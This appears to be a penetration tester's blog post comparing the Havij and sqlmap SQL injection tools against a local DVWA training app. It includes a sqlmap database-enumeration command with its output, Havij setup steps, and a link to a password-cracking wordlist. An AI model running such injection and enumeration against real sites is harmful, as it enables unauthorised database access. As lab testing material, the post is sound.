sql injection – havij

Great social engineering YouTube vid https://youtu.be/is0zRIxBUWA

myexploit vids http://www.youtube.com/user/myexploit2600

Any questions DM me on Twitter @myexploit2600

MyExploit presents Rocktastic one billion, unique word combination password dictionary

https://docs.google.com/uc?id=0Bx3odaY_Hs9oaGZuTGJnMG9lUUU&export=download

I wouldn't recemend Havij to anyone, if you don't like sqlmap try jsql injection in Kali. It's like Havij only seems to work with GET requests but is still updated unlike Havij.

Below is crap I wrote about Havij when I tested it. I never used it on a test because it's nasty! Use sqlmap ;0)

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

Download from http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/index.html

Backtrack 5R1

Havij is not installed be default. It’s a Windows only program. You can run it in wine.

1. Download Havij to your root folder. Un tar the file to root folder.

2. Right click on the Havij .exe file and Choose Open with Wine Windows Program Loader. Installs

3. Havij application should start.

Target = The inject able target. Click Analyze.

————————————————————

Havij log results for http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

Havij 1.15 Free!
You are using the Free version of Havij which is limited in some features, Please purchase the commerical version at http://itsecteam.com
Analyzing http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
Http Error: 302 Found
Host IP: 127.0.0.1
Web Server: Apache/2.2.14 (Ubuntu)
Powered-by: PHP/5.3.2-1ubuntu4.5
Finding Keyword…
Http Error: 302 Found
Retrying to find keyword…
Http Error: 302 Found
Http Error: 302 Found
Can not find keyword but let me do a try!
Finding Injection type…
Http Error: 302 Found
Http Error: 302 Found
Http Error: 302 Found
Http Error: 302 Found
Http Error: 302 Found
Http Error: 302 Found
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
Http Error: 302 Found
Finding data base type
Http Error: 302 Found
Can’t find db server type! But maybe there be some chances! [-o<
Finding columns count(MySQL,MsSQL 2005): 1
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 2
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 3
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 4
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 5
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 6
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 7
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 8
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 9
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 10
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 11
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 12
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 13
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 14
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 15
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 16
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 17
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 18
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 19
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 20
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 21
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 22
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 23
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 24
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 25
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 26
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 27
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 28
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 29
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 30
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 31
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 32
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 1
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 2
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 3
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 4
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 5
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 6
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 7
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 8
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 9
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 10
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 11
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 12
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 13
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 14
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 15
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 16
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 17
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 18
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 19
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 20
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 21
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 22
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 23
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 24
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 25
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 26
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 27
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 28
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 29
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 30
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 31
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 32
Http Error: 302 Found
Cannot find column count!
Testing for MySQL error based injection method
Http Error: 302 Found
Bypassing illegal union failed! Turning off this feature
Http Error: 302 Found
MySQL error based injection method cant be used!
Testing for MsSQL time based injection with 1000 ms delay
Http Error: 302 Found
Http Error: 302 Found
MsSQL time based injection method can’t be used
Testing for MySQL time based injection with 14 ms delay
Http Error: 302 Found
Http Error: 302 Found
MySQL time based injection method can’t be used
It seems that input parameter is not effective! Check the following:
Are you sure input parameter really exist?!
Are you sure the input value ‘Submit#’ is valid?
Are you sure the ‘GET’ method is correct?

————————————————————

SQLMAP Log results for http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

dojo@dojo-vm:~/tools/sqlmap$ ./sqlmap.py -u ‘http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#&#8217; –dbs

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 08:39:53

[08:39:53] [INFO] using ‘/home/dojo/tools/sqlmap/output/127.0.0.1/session’ as session file
[08:39:53] [INFO] resuming string match ‘Surname’ from session file
you did not provide any string to match. Do you want to use the resumed string to be matched in page when the query is valid? [Y/n]
[08:39:56] [INFO] resuming injection point ‘GET’ from session file
[08:39:56] [INFO] resuming injection parameter ‘id’ from session file
[08:39:56] [INFO] resuming injection type ‘stringsingle’ from session file
[08:39:56] [INFO] resuming 0 number of parenthesis from session file
[08:39:56] [INFO] resuming back-end DBMS ‘mysql 5’ from session file
[08:39:56] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ../../login.php – What target address do you want to use from now on? http://127.0.0.1:80/dvwa/vulnerabilities/sqli/ (default) or provide another target address based also on the redirection got from the application

>
[08:39:58] [INFO] testing for parenthesis on injectable parameter
[08:39:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[08:39:58] [INFO] fetching database names
[08:39:58] [INFO] fetching number of databases
[08:39:58] [INFO] read from file ‘/home/dojo/tools/sqlmap/output/127.0.0.1/session’: 4
[08:39:58] [INFO] read from file ‘/home/dojo/tools/sqlmap/output/127.0.0.1/session’: information_schema
[08:39:58] [INFO] read from file ‘/home/dojo/tools/sqlmap/output/127.0.0.1/session’: dvwa
[08:39:58] [INFO] read from file ‘/home/dojo/tools/sqlmap/output/127.0.0.1/session’: mysql
[08:39:58] [INFO] read from file ‘/home/dojo/tools/sqlmap/output/127.0.0.1/session’: w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[08:39:58] [INFO] Fetched data logged to text files under ‘/home/dojo/tools/sqlmap/output/127.0.0.1’

[*] shutting down at: 08:39:58

dojo@dojo-vm:~/tools/sqlmap$

————————————————————

SQLMAP results = 4 database found.

Havij results = 0 database found.

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s